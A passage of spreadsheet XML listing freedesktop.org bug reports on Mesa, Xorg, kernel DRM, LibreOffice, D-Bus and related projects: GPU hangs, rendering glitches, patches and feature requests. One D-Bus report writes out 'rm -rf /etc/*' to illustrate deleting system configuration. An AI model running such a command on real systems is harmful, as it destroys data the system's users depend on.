[  421.443060] [drm:i915_hangcheck_elapsed] *ERROR* Hangcheck timer elapsed... GPU hung
[  421.443071] [drm] capturing error event look for more information in /debug/dri/0/i915_error_state
[  421.469452] [drm:i915_wait_request] *ERROR* i915_wait_request returns -11 (awaiting 128404 at 128398 next 128407)
[  541.189805] [drm:i915_hangcheck_elapsed] *ERROR* Hangcheck timer elapsed... GPU hung
[  541.189870] [drm:i915_wait_request] *ERROR* i915_wait_request returns -11 (awaiting 175021 at 175015 next 175024)
[ 1896.540267] [drm:i915_hangcheck_elapsed] *ERROR* Hangcheck timer elapsed... GPU hung
[ 1896.540309] [drm:i915_wait_request] *ERROR* i915_wait_request returns -11 (awaiting 427313 at 427308 next 427324)
[ 5782.218952] [drm:i915_hangcheck_elapsed] *ERROR* Hangcheck timer elapsed... GPU hung
[ 5782.219024] [drm:i915_wait_request] *ERROR* i915_wait_request returns -11 (awaiting 885116 at 885111 next 885120)
may attach the video clip later</t>
  </si>
  <si>
    <t>cm_1997</t>
  </si>
  <si>
    <t>MESA-26707</t>
  </si>
  <si>
    <t>[G45] Galcon Fusion - game is completely black</t>
  </si>
  <si>
    <t>The game Galcon Fusion is completely black (but is running as the menu music is heard) with Mesa 7.8. It's working if software mode is used and is also working with the 7.7 branch.
I bisected the problem to 5ac16495a2772886100789f04e1a7d65068e9a40 which is a merge of 7.7 odd as the game is working in this branch?</t>
  </si>
  <si>
    <t>XORG-1429</t>
  </si>
  <si>
    <t>[PATCH] device reported name reported in atom  instead of type name</t>
  </si>
  <si>
    <t>XListInputDevices gives the local device name as type name instead of its real
type assigned</t>
  </si>
  <si>
    <t>svoltz</t>
  </si>
  <si>
    <t>LIBREOFFICE-66046</t>
  </si>
  <si>
    <t>alt hotkeys in task pane not working</t>
  </si>
  <si>
    <t>In the task pane LibreOffice underlines a character in multiple button texts. For example Add... in custom animation has the A underlined. That signals that the user can press alt+A to run that command. But alt+A doesn't do anything. In fact none of  those alt+___ commands does anything. 
Either remove the underlined text or make the alt shortcuts functional.</t>
  </si>
  <si>
    <t>M8R-qa7l3x</t>
  </si>
  <si>
    <t>MESA-107306</t>
  </si>
  <si>
    <t>[GEN8+] Hang when discarding a fragment if dual source blending is enabled but shader doesn't support it</t>
  </si>
  <si>
    <t>Hi as we found out the same issue exists and for Vulkan (original description can be found in this issue -&gt; https://bugs.freedesktop.org/show_bug.cgi?id=107088 )
Patch was also sent for review:
https://patchwork.freedesktop.org/patch/239979/</t>
  </si>
  <si>
    <t>MEDIA-PLAYER-INFO-66596</t>
  </si>
  <si>
    <t>can you remove amazon kindle from 40-usb-media-players.rules</t>
  </si>
  <si>
    <t>When connects Amazon Kindle Paperwhite to PC Rhythmbox pops up because it is reconized as a portable audio player.  But Kindle Paperwhite is not an audio player it has no speaker or jack no mp3 play functionality at all.
But the problem is Kindle Paperwhite shares the same USB product ID 0x0004 with Kindle 3/4/Touch.  Among them Kindle 3 and Touch have audio but Kindle 4 and Paperwhite don't.
In my opinion Kindle is mainly ebook reader audio playing is only a plus.  When connected to PC it is more likely used for book transferring than audio playing.
Because of ID_MEDIA_PLAYER gvfs guesses content type of the mount to be x-content/audio-player (gvfs_udisks2_mount_guess_content_type_sync).  It is more natural to be x-content/ebook-reader instead but there is no rule to handle that.
Maybe it is better to add udev rules to set something like ID_EBOOK_READER for Kindle at least ID_MEDIA_PLAYER can be removed.</t>
  </si>
  <si>
    <t>koreylu</t>
  </si>
  <si>
    <t>DRI-76501</t>
  </si>
  <si>
    <t>fences regression</t>
  </si>
  <si>
    <t>Created attachment 96233
dmesg 3.12
I am seeing a GPU lockup from any v3.13 up to 3.14-rc7 which basically renders my computer unusable under recent kernels :-(
[   55.762710] radeon 0000:01:00.0: GPU lockup CP stall for more than 10000msec
[   55.762715] radeon 0000:01:00.0: GPU lockup (waiting for 0x0000000000000004 last fence id 0x000000000000000 on ring 5)
[   55.762717] [drm:uvd_v1_0_ib_test] *ERROR* radeon: fence wait failed (-35).
[   55.762720] [drm:radeon_ib_ring_tests] *ERROR* radeon: failed testing IB on ring 5 (-35).
Hardware is an iMac 112 with a Radeon 4670 M96XT (RV730) 256MB GDDR3. 
working up to 3.12 broken as of 3.13.
Xorg comes up after some dalays with a mostly black screen some colored rectangular artifacts where the login fields are a working mouse cursor.
Console fb still works.
Bisected to this commit:
commit f9eaf9ae782d6480f179850e27e6f4911ac10227
Author: Christian KÃ¶nig 
Date:   Tue Oct 29 20:14:47 2013 +0100
    drm/radeon: rework and fix reset detection v2
    Stop fiddling with jiffies always wait for RADEON_FENCE_JIFFIES_TIMEOUT.
    Consolidate the two wait sequence implementations into just one function.
    Activate all waiters and remember if the reset was already done instead of
    trying to reset from only one thread.
    v2: clear reset flag earlier to avoid timeout in IB test</t>
  </si>
  <si>
    <t>POPPLER-6055</t>
  </si>
  <si>
    <t>empty squares instead of greek/math symbols</t>
  </si>
  <si>
    <t>this ( http://i10www.ira.uka.de/info3/skript/berechenbarkeit4.pdf ) pdf is not
displayed correctly with evince (poppler) althoug ghostview can display it
correctly.
in this pdf all symbols are displayed normal:
http://lkwiki.nomeata.de/latex/Ana2Par10.pdf</t>
  </si>
  <si>
    <t>XORG-17508</t>
  </si>
  <si>
    <t>[GM45 LVDS] Garbled Screen after start of Xorg on Sony vaio z11wn/b (with nvidia)</t>
  </si>
  <si>
    <t>After starting Xorg with the intel driver enabled the screen gets a glowing red line at the left side and then gets totally garbled. If i plug a Monitor in the monitor shows the normal picture. I tried to fiddle a little with xrandr to switch the LVDS to auto or use different resolutions but nothing helped. I tried this with a gentoo installation and the intel drivers from git as well as with ubuntu and the 2.4.1 and 2.4.2 drivers. My system is a sony vaio z11wn/b with an intel gm45 (x4500) and a nvidia geforce 9300m gs (i can switch between them). X.Org.log shows nothing specific and no errors as the x-server starts up as expected. I can post it if you need it but at the moment i cannot access my notebook. xorg.conf used was the one supplied by ubuntu as well as one edited by myself.</t>
  </si>
  <si>
    <t>oliver_pahl</t>
  </si>
  <si>
    <t>DRI-16334</t>
  </si>
  <si>
    <t>[DRM 945GM] i915 Oops (i915_driver_lastclose) when shutdown X</t>
  </si>
  <si>
    <t>Created attachment 17100
dmesg
The i915 drm module cause a oops when I try to shutdown X i915_driver_lastclose seems to be the cause of problem.
And this problem also exists in the drm git master.
Kernel: 2.6.25-gentoo-r4
xserver: git master commit d15b3790307053587df8daed1936ff6923881b63
mesa: drm-gem branch commit 407ce3da3c53c9ebba0fbf827d7b0f610122d44b
libdrm: drm-gem branch commit 100d6f3f83b559be000f69c04f9e5596cdc17c77
drm: drm-gem branch commit 100d6f3f83b559be000f69c04f9e5596cdc17c77
xf86-video-intel: drm-gem branch commit 02d7141ac395446613edba0f2e2a951e750e4e9f</t>
  </si>
  <si>
    <t>clotho67</t>
  </si>
  <si>
    <t>XORG-785</t>
  </si>
  <si>
    <t>make build of xterm configurable</t>
  </si>
  <si>
    <t>The pathc introduces the imake variable BuildXterm which toogles the build of xterm</t>
  </si>
  <si>
    <t>LIBREOFFICE-48405</t>
  </si>
  <si>
    <t>Calc crashes during execution of macro in XLS spreadsheet</t>
  </si>
  <si>
    <t>This was reported to the Debian bug tracking system. I can still reproduce it with LO 3.5.2:
Detailed steps on how to reproduce it and the affected XLS are are provided in the Debian bug report:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=640543</t>
  </si>
  <si>
    <t>jmm</t>
  </si>
  <si>
    <t>TANGO-11479</t>
  </si>
  <si>
    <t>[icon-naming-utils] create legacy link emblem-unreadable --&gt; emblem-noread</t>
  </si>
  <si>
    <t>Waiting for Nautilus update better create links :-)
A patch will come.</t>
  </si>
  <si>
    <t>POPPLER-107430</t>
  </si>
  <si>
    <t>spurious warning thrown by pdfinfo when Marked=false in MarkInfo</t>
  </si>
  <si>
    <t>I have a lot of PDF files that were edited by Adobe Acrobat for which pdfinfo reports a warning:
Syntax Error: Marked object is wrong type (boolean)
I believe I have located the problem: This warning is emitted when the Marked key in the MarkInfo entry in the document catalog has a value of false.  That *should* be an allowed value but pdfinfo emits the warning due to the following code in Catalog.cc (within getMarkInfo):
    if (catDict.isDict()) {
      Object markInfoDict = catDict.dictLookup(MarkInfo)
      if (markInfoDict.isDict()) {
        Object value = markInfoDict.dictLookup(Marked)
        if (value.isBool() &amp;&amp; value.getBool())
          markInfo |= markInfoMarked
        else if (!value.isNull())
          error(errSyntaxError -1 Marked object is wrong type ({0:s}) value.getTypeName())
There is no problem when the Marked key has a value of true or if it is omitted altogether.
This issue appears in poppler 0.66 and as far back as poppler 0.39.</t>
  </si>
  <si>
    <t>jeffrey.Lerman</t>
  </si>
  <si>
    <t>CAIRO-4260</t>
  </si>
  <si>
    <t>Antialised font is rendered over green background</t>
  </si>
  <si>
    <t>Antiliased fonts are rendered over a green background.
see screenshot: http://www.gods-inc.de/barbie/solaris/funkytext.png
Other information:
Cairo 1.0.0
gtk+ 2.8.2
glib 2.8.1
pango 1.9.1
atk 1.10.1
glitz 0.4.4
SunOS hel 5.10 Generic_118822-08 sun4u sparc SUNWSun-Blade-1000
XVR-1000 Graphics board
Software compiled with Sun Studio 10</t>
  </si>
  <si>
    <t>barbie</t>
  </si>
  <si>
    <t>XORG-16910</t>
  </si>
  <si>
    <t>Created attachment 18014
ssh pub key
Name : Xavier Bachelot
Mail address : xavier@bachelot.org
Preferred account name : xavierb
GPGkey : 0xDB423490
I'm a member of the openchrome team and would like to see this driver available in xorg releases so I need an account to upload the releases tarballs to fd.o.</t>
  </si>
  <si>
    <t>MESA-79155</t>
  </si>
  <si>
    <t>[Tesseract Game] Global Illumination: Medium Causes Color Distortion</t>
  </si>
  <si>
    <t>Created attachment 99679
Screenshot of graphical error
Currently using a Radeon HD 7950 with the latest git of mesa. Setting Global Illumination to Medium or above causes graphical corruption.</t>
  </si>
  <si>
    <t>mmstickman</t>
  </si>
  <si>
    <t>XORG-14722</t>
  </si>
  <si>
    <t>dual monitor flicker and loss of signal</t>
  </si>
  <si>
    <t>We've recently upgraded all the workstations in my department to nice new HP machines with X1600XT PCIe cards (RV530 chipset I think) dual 24 HP LP2465 monitors and Fedora 8. So far they've worked great with the RadeonHD 1.1 drivers until we went to an extended desktop and started using them full time. On all of our machines the right display (i.e. second display) has a weird flicker problem. Every few minutes horizontal black lines will randomly flash quickly across the screen and maybe once an hour the screen completely looses its signal for about a second and then comes back on.
I've ruled out the monitors or the videocard/workstation at this point. Also the fact that it happens on all the machines leads me to believe its a driver issue not faulty hardware. Using the same monitors and RadeonHD release on my X1650 AGP in an older workstation never exhibited the problem once. I'm guessing it's this particular chipset or maybe the fact that it's dual DVI out. The AGP card without the problem is VGA/DVI.
The issue is always in the secondary port. From xrandr:
DVI-I_2/digital connected 1920x1200+1920+0 519mm x 324mm
  1920x1200      60.0*+ 
I've been looking at Bug #13853 and it seems similar but I'm not experiencing the  permanent loss of signal it always returns immediately. Also I'm using xorg-x11-drv-radeonhd-1.1.0-0.6.20080216git.fc8 which is supposedly built after the fixes in #13853 were applied so it must be a separate or related issue.
Please let me know if there is any testing I can do I'd love to help.</t>
  </si>
  <si>
    <t>dhalik</t>
  </si>
  <si>
    <t>XORG-99943</t>
  </si>
  <si>
    <t>xserver (git version): Fatal server error</t>
  </si>
  <si>
    <t>Created attachment 129897
xorg.0.log fatal server error
Using the latest git version of xserver (7d7788e0f2fb...) compiled with Debian's
gcc-7 I get the following
Fatal server error:
[  3914.258] (EE) GLSL compile failure
Please see the attached xorg.0.log
No such error when using the released xorg-server-1.19.1 (commit ad2facda30...).</t>
  </si>
  <si>
    <t>MESA-51782</t>
  </si>
  <si>
    <t>mesa-8.0.3: fails to compile against uclibc</t>
  </si>
  <si>
    <t>Created attachment 63883
Fix compile time errors against uclibc
mesa is mostly okay with uclibc instead of glibc but 8.0.3 does miss a few checks that fall back on glibc-ism and cause compile time failures.  The following patch fixes this issue.
This was hit in Gentoo on amd64 but would affect all uclibc systems on all arches.  Downstream bug is at
   https://bugs.gentoo.org/show_bug.cgi?id=425042
The attached patch fixes the issue.</t>
  </si>
  <si>
    <t>blueness</t>
  </si>
  <si>
    <t>MESA-36238</t>
  </si>
  <si>
    <t>Mesa release files don't contain scons control files</t>
  </si>
  <si>
    <t>The file ftp://ftp.freedesktop.org/pub/mesa/7.10.2/MesaLib-7.10.2.zip and the equivalent .tar.gz and .tar.bz2 files don't contain any scons control files (SConstuct or SConscript files). scons is the recommended way of building Mesa at least on Windows so these are needed.
The files do exist on in the tag on the git repository.</t>
  </si>
  <si>
    <t>anthony.berent</t>
  </si>
  <si>
    <t>MESA-38353</t>
  </si>
  <si>
    <t>r600g : lock in desktop display durring piglit test</t>
  </si>
  <si>
    <t>with the commit : r600g: Allow VRAM for the initial domain for every buffer binding. (b0f1767d776e2c80cab4343b4cd59553fbf5e48a)
I have a lock in desktop display during :
I can move the mouse the cursor position is updated. 
But background display is not updated and mouse don't interact with desktop.
If I revert this change on git HEAD I don't have the problem.</t>
  </si>
  <si>
    <t>xoddark</t>
  </si>
  <si>
    <t>LIBREOFFICE-74474</t>
  </si>
  <si>
    <t>Label Wizard freeze with bibliography database</t>
  </si>
  <si>
    <t>Problem description: 
Creating labels with Wizard freeze LibO
Steps to reproduce:
1. File &gt; New &gt; Labels
2. Select Database: Bibliography Table: biblio 
3. Insert some fields in Label text
4. New Document
Current behavior:
LibO freeze
Expected behavior:
Labels document should be created like with LibO 4.1.5.1</t>
  </si>
  <si>
    <t>LIBREOFFICE-70596</t>
  </si>
  <si>
    <t>master install set broken on Debian systems: dependency problems</t>
  </si>
  <si>
    <t>Hi
There is a problem with the DEB files produced by the build system for the master. When installing them as a normal release (sudo dpkg -i etc.) I get the same error message several times. The message says that there is dependency problem.
English translation of French error message:
&gt; dpkg: dependency problems prevent configuration of libreofficedev4.2 :
&gt; libreofficedev4.2 depend on libreofficedev4.2-ure (&lt;= 4.2.0.0.alpha0)  but : The version of libreofficedev4.2-ure on the system is 4.2.0.0.alpha0-1.
If I compare the DEBs for LO 4.1.x and the DEBs for the master I see that the /DEBIAN/control files set the dependency constraints differently. For example for the Math module (it's the same thing for others):
in LO 4.1.4.0.0+ : 
Version: 4.1.4.0.0-1
[...]
Depends: libobasis4.1-core01
in the master: 
Version: 4.2.0.0.alpha0-1
[...]
Depends: libobasis4.2-core01 (&gt;= 4.2.0.0.alpha0) libobasis4.2-core01 (&lt;= 4.2.0.0.alpha0)
I have the same problem with my own build and with the daily build from http://dev-builds.libreoffice.org/daily/master/Linux-rpm_deb-x86_64@46-TDF/
I do not know where to look in the code to fix the problem.
Best regards. JBF</t>
  </si>
  <si>
    <t>XORG-1945</t>
  </si>
  <si>
    <t>Latest changes to rootless/multiwindow causes redraw problems</t>
  </si>
  <si>
    <t>See http://www-user.tu-chemnitz.de/~goal/Xming/multiwindow.jpg
Moving the xterm around in multiwindow mode will draw the root window hatch
and some of the content. Maybe it's a missing copywindow or copywindow with 
a wrong drawable. I've not looked at it further</t>
  </si>
  <si>
    <t>zakki</t>
  </si>
  <si>
    <t>LIBREOFFICE-68036</t>
  </si>
  <si>
    <t>Daily build has different time in Help/About than in the name build file.</t>
  </si>
  <si>
    <t>Daily build file name:
http://dev-builds.libreoffice.org/daily/master/Win-x86@6-debug/current/master~2013-08-12_06.36.52_LibreOfficeDev_4.2.0.0.alpha0_Win_x86.msi
In http://../master~2013-08-12_06.36.52_build_info.txt
Build Info
tinderbox: administrator: Tinderbox 
tinderbox: buildname: Win-x86@6-debug
tinderbox: tree: MASTER
tinderbox: pull time 2013-08-12 06:36:52
tinderbox: git sha1s
core:9499df9f8c73ac6370c389683ce2028e6432441e
In Menu/Help/Abaut
Version: 4.2.0.0.alpha0+
Build ID: 9499df9f8c73ac6370c389683ce2028e6432441e
TinderBox: Win-x86@6-debug Branch:master Time: 2013-08-10_21:43:34
The Build ID it is the same but the time in Menu/Help/About it is different but the same than the previous build.</t>
  </si>
  <si>
    <t>DRI-102988</t>
  </si>
  <si>
    <t>[CFL] DUT doesn't get back from s3 s4 and freeze</t>
  </si>
  <si>
    <t>Created attachment 134482
dmesg  CFL-1
When I send the CFL to S3 S4 and Freeze DUT is not able to get back from these states with latest configuration.
When I run these tests without firmware and try to get back from any of these states I get video from the monitors but DUT still without response.
There is a physical swap partition available for these test
Steps:
1.-With a physical swap partition available run the following commands:
	# echo mem&gt; /sys/power/state
	# echo disk &gt; /sys/power/state
	# echo freeze &gt; /sys/power/state
2.- Check that DUT is not able to get back from any of these states
This looks like a regression  due to kernel 4.13-rc7-428ed2734 didn't present this kind of issues.
Attached kernel.log dmesg.log and configuration of two different CFL where these tests were performed.  
When I send the CFL to S3 S4 and Freeze DUT is not able to get back from these states with latest configuration.
When I run these tests without firmware and try to get back from any of these states I get video from the monitors but DUT still without response.
There is a physical swap partition available for these test
Steps:
1.-With a physical swap partition available run the following commands:
	# echo mem&gt; /sys/power/state
	# echo disk &gt; /sys/power/state
	# echo freeze &gt; /sys/power/state
2.- Check that DUT is not able to get back from any of these states
This looks like a regression  due to kernel 4.13-rc7-428ed2734 didn't present this kind of issues.
Attached kernel.log dmesg.log and configuration of two different CFL where these tests were performed.</t>
  </si>
  <si>
    <t>DRI-19939</t>
  </si>
  <si>
    <t>[GM965 KMS] â€œacid modeâ€ when resuming</t>
  </si>
  <si>
    <t>Hi
as said on intel-gfx mailing list I have a problem on my Thinkpad T61 with KMS:
It suspends fine but at resume the screen is corrupted with rainbow colors:
http://molly.corsac.net/~corsac/acid/thinkpad-acid.jpg (really nice indeed but a bit scary at first sight)
I'm running:
Linux 2.6.29-rc3+thinkpad-00445-g904e012 (linux-2.6/master + drm-2.6/drm-fixes
Xorg 1.5.99.902
xf86-video-intel master with the FENCE commit reverted.
Following Jesse Barnes advice I dumped registers before/after and I'm attaching them but they don't really show much.
I'm suspending from X11 using: echo mem &gt; /sys/power/state</t>
  </si>
  <si>
    <t>corsac</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-21302</t>
  </si>
  <si>
    <t>make Xkb variant 'winkeys' default for 'ua' keyboard layout</t>
  </si>
  <si>
    <t>Please make Xkb variant 'winkeys' default for 'ua' keyboard layout.
A similar change was done some time ago for 'ru' keyboard layout and 'ua' layout is different from 'ru' one only in few letters and probably most of users of 'ua' layout also have 'ru' layout installed too so IMHO it would be good to have equal default Xkb variants.</t>
  </si>
  <si>
    <t>jackyf.devel</t>
  </si>
  <si>
    <t>LIBREOFFICE-52392</t>
  </si>
  <si>
    <t>: Bibliography database autofills empty fields with symbols</t>
  </si>
  <si>
    <t>Created attachment 64538
Screenshoot with the symbols that appear and how it's seen in the bibliographic index.
Problem description: 
When you create a new entry in the Bibliographic database the fields that you don't fill are autofilled with a buggy triangle symbol.
Then if you add a bibliographic entry from the database to the document and you have an index the symbols are shown.
Appears in both 3.5.5.3 and 3.5.5.2.
Steps to reproduce:
1. From Tools -&gt; Bibliographic database create a new bibliographic entry filling only the Identifier and for example the Type.
2. Click on another entry or close the database navigator.
Current behavior:
The newly created one will be filled by symbols where there were no data.
Inserting into the document a reference to this new entry and updating a default Bibliographic Index will make appear these symbols into the index.
It does not happen when adding a new bibliography entry internally to the document and not to the database.
You can try to delete the auto-filled fields in the database but it's difficult you have to do from the leftiest cell to rightest otherwise it gets filled another time.
Expected behavior:
Not to fill up the empty fields with symbols.
Platform (if different from the browser): 
Browser: Mozilla/5.0 (X11 Linux x86_64 rv:12.0) Gecko/20100101 Firefox/12.0 Iceweasel/12.0</t>
  </si>
  <si>
    <t>lipixx</t>
  </si>
  <si>
    <t>DBUS-89280</t>
  </si>
  <si>
    <t>support ignore_missing attribute in the includedir element and use that to support all default configuration in datadir</t>
  </si>
  <si>
    <t>Created attachment 113750
[1/2] Add support for ignore_missing attributed in includedir
 bus config
At the moment if one does:
$ rm -rf /etc/*
quite a few things break. Including dbus or rather configuration of buses and things exported on them.
I would like to introduce support to have all configuration shipped in datadir rather than split between sysconfdir &amp; datadir.
I would like to none-the-less maintain backwards compatibility with previous configuration locations in sysconfdir.
To achieve this I'm proposing two patches:
* add support for ignore_missing attribute in the includedir element similar to include element.
* use ignore_missing='yes' by default for system.d/session.d includedir stanzas (this btw resolves a bug that dbus does not start unless those (empty) directories exist) and in this patch i've explicitely include sysconfdir locations in addition to the relative ones.
These patches do not switch installation of that configuration from sysconfdir to datadir by default. If this is deemed acceptable to switch to that on opt-in / opt-out basis i'll happy to provide necessary autofoo changes to achieve that.
In my case I simply use ./configure --sysconfdir=/usr/share to achieve the switch and ship all configuration in /usr/share/dbus-1/ rather than in /etc. And this works very well.
Regards
Dimitri.
https://01.org/clearlinux
Open Source Technology Center
Intel Corporation (UK) Ltd. - Co. Reg. #1134945 - Pipers Way Swindon SN3 1RJ.</t>
  </si>
  <si>
    <t>dimitri.j.ledkov</t>
  </si>
  <si>
    <t>GSTREAMER_SDK-52520</t>
  </si>
  <si>
    <t>VS2010 cpp project - Linking issues after 2012.7 upgrade.</t>
  </si>
  <si>
    <t>Projects were built using the 2012.5 gstream-sdk &amp; gstream-sdk-devel  x86 &amp; x86_64  distributions on a Win7 64-bit system in the folder:  c:/gstreamer-sdk/2012.5.
All projects were built and running successfully. 
Then I tried upgrading 
2012.7 .msi files were downloaded and installed. Afterwards   the folder c:/gstreamer-sdk consists of 2012.5  linked to 0.10
environment variables:
GSTREAMER_SDK_ROOT_X86= c:\streamer-sdk-2012.5\x86\
GSTREAMER_SDK_ROOT_X86= c:\streamer-sdk-2012.5\x86_64\
PATH= ...c:\streamer-sdk-2012.5\x86_64\\bin
afterwards errors appeaer like:
Intellisense cannot open source file gst/gst.h
I also tried to build a new gstreamer project but the properties such as gstreamer-0.10 do not get installed.  Do I need to reinstall the files from folder msvc and wizard for the 2012.7 distribution first?
Are there any environmental variable to check or change? I rather not build all the projects from scratch again. 
Should I uninstall the gstreamer sdks and start clean with the 2012.7 versions?
Thanks in advance.</t>
  </si>
  <si>
    <t>testsdk123</t>
  </si>
  <si>
    <t>PACKAGEKIT-15173</t>
  </si>
  <si>
    <t>PackageKit user interface is a complete disaster (stop scaring my mom)</t>
  </si>
  <si>
    <t>General commentary:
  - it has no focus group. Who should use this tool? a system administrator or my mom? Because its too weak the administrator and too scary for my mom.
  - given the name and the location of the link (right there in the programs menu) it should not try to replace a synaptic-like tool. The add/remove software interface should be kept low-entry. No fucky stuff. 
  - Perhaps the solution is to split it into a simple and advanced version?
Specific Usability issues:
- search in a different tab (seriously why? put it on the top or bottom and seach-as-we-type like all the other gnome-apps websites etc. 
- install button not in screen all the time (usability 101: basic use-case should be immideately appearant). Dim the button when no application is selected. So by default show apps and show an install button.
- it doesn't show which apps are already installed (try a checkbox! or a red/green mark in front of it)
- already installed apps should be on top of the list. 
- the groups should mimick the default menu structure. This reinforces confidence where they will be able to find the apps (where does my app go?)
- it should not contain localization libraries command-line-tools etc. Unless they impact a desktop-application in which case they should be renamed to 'xxx Support' (stop scaring my MOM)
- it should use the application name from the .desktop file not the package-name. And if you really really really want to show the _internal_ name then do not make it bold and the most prominent title (stop scaring my MOM!)
- remove all these extra tabs about dependencies and such. Stop scaring my MOM.
- add support for a screenshot (she likes screenshots)
****
If these insights are convincing enough and actually reach a future version feel free to call that version 'stop scaring mom' -)</t>
  </si>
  <si>
    <t>ralf.nieuwenhuijsen</t>
  </si>
  <si>
    <t>SYNCEVOLUTION-70472</t>
  </si>
  <si>
    <t>error code from SyncEvolution fatal error (local status 10500): calendar: storing new item: Cannot create calendar object: The request failed schema validation: The 'http://schemas.microsoft.com/exchange/services/2006/types:EmailAddress' element is inval</t>
  </si>
  <si>
    <t>Created attachment 87642
Log of error
Binaries from Debian Sid
Evolution ver 3.8-5 (Debian Jessie)
Synchronisation with memotoo
Tried to refresh from server by syncevolution --sync refresh-from-server memotoo calendar
Locked in a loop - keeps showing the following error:
[ERROR] error code from SyncEvolution fatal error (local status 10500): calendar: storing new item: Cannot create calendar object: The request failed schema validation: The 'http://schemas.microsoft.com/exchange/services/2006/types:EmailAddress' element is invalid - The value '' is invalid according to its datatype 'http://schemas.microsoft.com/exchange/services/2006/types:NonEmptyStringType' - The actual length is less than the MinLength value.
Had to abort the synchronisation.
This just started couple of days ago.</t>
  </si>
  <si>
    <t>dkoh309655</t>
  </si>
  <si>
    <t>MESA-23457</t>
  </si>
  <si>
    <t>[G45] asm-shader-rework-1 broke Doom 3</t>
  </si>
  <si>
    <t>The merge of the asm-shader-rework-1 branch broke Doom 3 (and I guess all other titles using the same engine). The game is now almost completely black (see screenshot).
System environment:
-- chipset: G45 / ICH10R
-- system architecture: 32-bit
-- Linux distribution: Debian unstable
-- Machine or mobo model: Asus P5Q-EM
-- Display connector: DVI
-- KMS: enabled
-- xf86-video-intel: 5dccd1be3ab80b642ef2022446f5bdc1656ed943
-- xserver: 1.6.3
-- mesa: bf5d6cf455c02d752cfea320f14765b997dc7266
-- drm: d74c67fb13d8c3e8c2e5968d827285d147a5dfc0
-- kernel: 2.6.31-rc6 (debian)</t>
  </si>
  <si>
    <t>DRI-105487</t>
  </si>
  <si>
    <t>[CI] igt@drv_module_reload@basic-no-display - fail - igt_kmod-WARNING: Could not unload i915 -Failed assertion: reload(disable_display=1) == 0</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/IGT_4353/shard-glkb1/igt@drv_module_reload@basic-no-display.html
(drv_module_reload:2976) igt_kmod-WARNING: Could not unload i915
(drv_module_reload:2976) CRITICAL: Test assertion failure function __real_main304 file ../tests/drv_module_reload.c:320:
(drv_module_reload:2976) CRITICAL: Failed assertion: reload(disable_display=1) == 0
(drv_module_reload:2976) CRITICAL: Last errno: 11 Resource temporarily unavailable
(drv_module_reload:2976) CRITICAL: error: 77 != 0
Subtest basic-no-display failed.</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-19773</t>
  </si>
  <si>
    <t>expose lv3:enter_switch</t>
  </si>
  <si>
    <t>Created attachment 22300
unhide lv3:enter_switch
Hi Sergey
Debian's carrying the attached patch by Denis Barbier since 2006 it was added with the following comment:
debian/patches/unhide_lv3_enter_switch.diff: New patch to
expose lv3:enter_switch it can be useful when using pc105
model on a Mac laptop.
Submitting for your consideration.  If you don't think it's a good idea I'll drop it from our package.
Cheers
Julien</t>
  </si>
  <si>
    <t>LIBREOFFICE-45912</t>
  </si>
  <si>
    <t>Connecting to access database using libreoffice's driver: one record missing</t>
  </si>
  <si>
    <t>I have detected the same bug that this user (not me :D) describe in his blog. See the post for more information. 3.5.x seems to be solved the problem.
http://do-the-right-things.blogspot.com/2012/01/caveat-in-using-libreoffice-base-to.html</t>
  </si>
  <si>
    <t>pirrimanson2000</t>
  </si>
  <si>
    <t>WAYLAND-100014</t>
  </si>
  <si>
    <t>Input events show up as scroll events not drag events</t>
  </si>
  <si>
    <t>Created attachment 129993
libinput-debug-events --berbose
My XPS 13 touchpad started acting up when switching to the RMI driver.
Almost everything works and I use 'tap-to-click' for things. But then when I want to drag things a longer distance I will do a real full click with one finger and then drag another finger to drag it. 
That used to work fine with the PS/2 emulation but seems to not work with the touchpad in RMI mode.
This is Fedora 24 with 
  libinput-1.5.4-1.fc24.x86_64
and I'm attaching the output of libinput-debug-evnts --verbose as the attachement.
Note how it goes from
  gesture state: GESTURE_STATE_UNKNOWN â†’ GESTURE_STATE_SCROLL
   event16        POINTER_AXIS      +2.98s        vert 0.00 horiz 3.94*
even though the button is pressed which apparently shouldn't be the case.
If there is anything else I can do holler.</t>
  </si>
  <si>
    <t>torvalds</t>
  </si>
  <si>
    <t>LIBREOFFICE-30668</t>
  </si>
  <si>
    <t>Paragraph size limit in 65k symbols (17171)</t>
  </si>
  <si>
    <t>Maybe someone fix this idiotic bug?</t>
  </si>
  <si>
    <t>MESA-18352</t>
  </si>
  <si>
    <t>[i965] Artifacts on the screen</t>
  </si>
  <si>
    <t>Hi
Since 1.5-2 weeks there is regression in master mesa. I guess its not GLSL related but I am not sure. I see moving lines on the screen this also happens with other OpenGL games for example bzflag.
For reference check screen-shot URL.
http://img90.imageshack.us/img90/9610/sc021108pp1.jpg
Also this show some artifacts but they're moving and blinking so only few are visible
http://img220.imageshack.us/img220/8667/sc2021108ht3.jpg</t>
  </si>
  <si>
    <t>DRI-88641</t>
  </si>
  <si>
    <t>[snb 3.17] ringbuffer wrap overshoot? batchbuffer incoherence?</t>
  </si>
  <si>
    <t>Created attachment 112564
GPU crash dump
Error occurs consistently in firefox/chromium and are sometimes recoverable by closing dwm (like the error attached). Usually black blocks are visible beforehand.</t>
  </si>
  <si>
    <t>arjanbruin86</t>
  </si>
  <si>
    <t>XORG-65099</t>
  </si>
  <si>
    <t>[GM45] Video corruption on wide desktop</t>
  </si>
  <si>
    <t>I have a ThinkPad laptop with a GM45 chipset that I connect to two external monitors via a Matrox DualHead2Go box.
I recently upgraded from Ubuntu Precise to Raring.  After the upgrade if I enable the external monitors using `xrandr --output VGA1 --mode 3840x1200 --right-of LVDS1` or `xrandr --output VGA1 --mode 3840x1200 --left-of LVDS1` the external monitors turn on but the entire screen (including LVDS1) is corrupted.
Using '--above' or '--below' instead of '--right-of' or '--left-of' does not cause screen corruption.  Reverting xserver-xorg-video-intel from 2.21.6-0ubuntu4 to 2.20.9-0ubuntu2.1 without making any other changes fixes the problem (I can use '--right-of' or '--left-of' again without screen corruption).
I'll submit additional information as I collect it.</t>
  </si>
  <si>
    <t>XORG-10717</t>
  </si>
  <si>
    <t>nouveau fails to start waiting on dma</t>
  </si>
  <si>
    <t xml:space="preserve">Steps to reproduce: grabbed DRM and the nouveau xf86 driver from git today running against linux 2.6.20.7 with swsusp2. When I restart X a blank screen appears with a cursor (that I can move with the mouse) but then it dies.
